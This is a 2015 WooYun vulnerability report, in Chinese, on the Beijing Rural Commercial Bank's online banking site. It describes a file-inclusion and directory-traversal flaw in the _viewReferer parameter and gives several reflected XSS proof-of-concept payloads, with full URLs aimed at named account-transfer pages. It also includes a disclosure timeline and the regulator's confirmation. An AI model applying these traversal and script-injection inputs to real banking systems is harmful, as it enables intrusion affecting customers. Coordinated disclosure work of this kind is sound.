漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0120524
漏洞标题:金融小能手之北京农商银行(文件包含、XSS等)
相关厂商:北京农商银行
漏洞作者: 咚咚呛
提交时间:2015-06-15 02:09
修复时间:2015-08-03 17:44
公开时间:2015-08-03 17:44
漏洞类型:文件包含
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-06-15: 细节已通知厂商并且等待厂商处理中
2015-06-19: 厂商已经确认,细节仅向厂商公开
2015-06-29: 细节向核心白帽子及相关领域专家公开
2015-07-09: 细节向普通白帽子公开
2015-07-19: 细节向实习白帽子公开
2015-08-03: 细节向公众公开
简要描述:
太晚了,困了,测了差不多有一半,问题不少。
详细说明:
1、文件包含
说明:这个洞应该就是之前科蓝发生的文件包含通杀洞涉及N家银行,任意文件包含,不知道柯蓝确认修了没,一看参数CSIISignature就知道是科蓝公司的,讲下我发现的过程。
链接:https://ibs.bjrcb.com/per/login.do
参数:_viewReferer
默认是这个样子滴,如图:
_viewReferer=login&PasswordEncode=&_locale=zh_CN&CSIISignature=bjrcb&UserCert=&T=1&CertEnableFlag=NO&randKey=736383&UserId=1111111111&_tokenName=7bqq
观察参数viewReferer,它的值是login,猜想它是个文件,只是后缀被省去了后缀,试下%00
发现提示个这个,然后我试了多个截断字符,发现“%3f”,可以截断,并且确实是我猜测的在代码层加入后缀的,如图:
你会发现它去找文件了“找不到文件:/WEB-INF/zh_CN/login”,那么试试../是否能跨到上层目录呢,如图:
发现确实跨到上层目录去找文件了,那么是否能包含文件并解析呢,我试图去查找并包含web.xml文件,但是并没有找到,如图:
但是经过我测试这个包含确实存在,比如我找张图片,它可以很完美的包含并解析出来,如图:
2、XSS跨站脚本攻击
功能点:大额取现预约
连接:CashUseage赋值11 "/><script>alert(1)</script>
https://ibs.bjrcb.com/per/DrawAppointmentQueryDetail.do?AppJnlNo=55699785&AcNo=1111111&Amount=50000&RecordDate=2015-06-14&DrawDate=2015-06-20&Branch=Ììͨԕ֧ÐÐÁúÐË•ÖÀí´¦&AppStatus=1&UserName=xss&UserPhone=15910773439&UserMobilePhone=15910773439&AppSMSInform=0&CashUseage=1"/><script>alert(1)</script>
3、XSS跨站脚本攻击
功能点:活期转定期
连接:https://ibs.bjrcb.com/per/Current2Fixed02.do
参数:Remark赋值11 "/><script>alert(1)</script>
此处POST可以改为GET,把参数提上来就成:
4、XSS跨站脚本攻击
功能点:活期转定期
连接:https://ibs.bjrcb.com/per/CurrentSvFuDrawOpen02.do
参数:Remark 赋值11 "/><script>alert(1)</script>
POST改为GET,XXXX填入你登陆的账户:
https://ibs.bjrcb.com/per/CurrentSvFuDrawOpen02.do?_viewReferer=financing%2FCurrentSvFuDrawOpen01&RateSpan=2.22%25&AcNo=xxxxxxxx&Currency=01&Amount=50&SaveTime=Y01&AutoDeductFlag=1&Remark=1111%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
5、XSS跨站脚本攻击
功能点:活期转定期
连接:https://ibs.bjrcb.com/per/Current2Notice02.do
参数:Currency赋值01 "/><script>alert(1)</script>
POST改为GET,XXXXXXXXXX为对应账户号码:
https://ibs.bjrcb.com/per/Current2Notice02.do?_viewReferer=financing%2FCurrent2Notice01&AcNo=XXXXXXXXXX&Currency=01"/><script>alert(1)</script>&InformType=0330&Rate=0.96%25"&Amount=50000
6、XSS跨站脚本攻击
说明:这个XSS不同于上面,它直接把参数值带入到js代码中当参数运用,并且对传入的值进行了过滤,如图:
但是可以用”;“对js进行截断,使它执行js代码,并且它是在函数内,必须此函数调运才能执行,此处需点击确定后出发相应恶意js代码,如图:
https://ibs.bjrcb.com/per/OftenAcList.do?AcTransferType=111111;alert(1);
功能点:行内转账-常用收款人
漏洞证明:
详情看上面吧,挺全的!~
总结先不写呢,还没测完呢,太晚了分批上传。
修复方案:
文件包含那个漏洞,直接找柯蓝公司,让他们负责修复,这是个框架的问题,不仅登陆页面有包含,登陆后每个链接都是问题。
至于XSS漏洞,你们过滤的挺全的,还按照那个方案走没问题,只是把遗漏的补上就成。
版权声明:转载请注明来源 咚咚呛@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2015-06-19 17:42
厂商回复:
CNVD确认并复现所述情况,已经转由CNCERT向银行业信息化主管部门通报,由其后续协调网站管理单位处置.
最新状态:
暂无